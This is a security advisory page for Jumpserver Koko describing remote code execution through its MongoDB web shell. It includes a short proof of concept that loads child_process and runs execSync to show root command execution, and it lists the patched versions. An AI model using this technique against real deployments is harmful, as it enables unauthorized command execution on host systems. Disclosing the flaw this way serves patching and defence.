GHSA-4r5x-x283-wm96

    Dashboard / Vulnerabilities / GHSA-4r5x-x283-wm96

    GHSA-4r5x-x283-wm96

    Published: 24 Oct 2023Last Modified: 10 Sept 2026

    Summary: Jumpserver Koko vulnerable to remote code execution on the host system via MongoDB shell

    Details: ### Impact An authenticated user can exploit a vulnerability in MongoDB sessions to execute arbitrary commands, leading to remote code execution. This vulnerability may further be leveraged to gain root privileges on the host system. ### Details Through the WEB CLI interface provided by koko, a user logs into the authorized mongoDB database and exploits the MongoDB session to execute arbitrary commands. ``` admin> const { execSync } = require("child_process") admin> console.log(execSync("id; hostname;").toString()) uid=0(root) gid=0(root) groups=0(root) jms_koko admin> ``` ### Patches Safe versions: - v2.28.20 - v3.7.1 ### Workarounds It is recommended to upgrade the safe versions. After upgrade, you can use the same method to check whether the vulnerability is fixed. ``` admin> console.log(execSync("id; hostname;").toString()) /bin/sh: line 1: /bin/hostname: Permission denied ``` ### References Thanks for **Oskar Zeino-Mahmalat** of [Sonar](https://sonarsource.com/) found and report this vulnerability

    Affected packages

    Package

    Name: github.com/jumpserver/koko

    Purl: pkg:golang/github.com/jumpserver/koko

    Affected ranges

    Type: SEMVER

    Events:

    Introduced- 2.0.0
    Fixed -2.28.20

    Affected versions

    Common Vulnerability Scoring System

    Attack Vector
    Network
    Adjacent
    Local
    Physical
    Privileges Required
    None
    Low
    High
    User Interaction
    None
    Required
    Scope
    Unchanged
    Changed
    Confidentiality
    None
    Low
    High
    Integrity
    None
    Low
    High
    Availability
    None
    Low
    High
    GHSA-4r5x-x283-wm96 | CVE-DB